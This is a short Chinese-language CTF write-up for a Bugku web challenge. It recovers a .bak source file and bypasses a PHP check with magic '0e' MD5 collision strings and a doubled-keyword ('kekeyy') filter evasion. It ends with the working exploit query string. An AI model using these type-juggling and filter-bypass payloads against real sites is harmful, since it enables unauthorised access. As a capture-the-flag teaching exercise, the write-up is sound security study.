【CTF-web】備份是個好習慣（查找備份文件、雙寫繞過、md5加密繞過）

題目鏈接：https://ctf.bugku.com/challenges/detail/id/83.html

經過掃描可以找到index.php.bak備份文件，下載下來后打開發現是index.php的原代碼，如下圖所示。
在這里插入圖片描述
由代碼可知我們要繞過md5加密，兩數如果滿足科學計數法的形式的話，php會將其當作科學計數法所得的數字來進行比較，根據該原理，如果兩個md5碼是0e開頭且滿足科學計數法的表示形式就會判斷相等（只對==比較有效，===無效）。
下面列出一些滿足要求的字串以及相應的md5碼：

QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675

還有一個問題，那就是str_replace()函數，原代碼中會將’key’給刪去，所以我們要用雙寫繞過，將key寫成kekeyy即可。
于是在url最后輸入?kekeyy1=QNKCDZO&kekeyy2=s878926199a即可得到flag。

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/40454.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/40454.shtml
英文地址，請注明出處：http://en.pswp.cn/news/40454.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！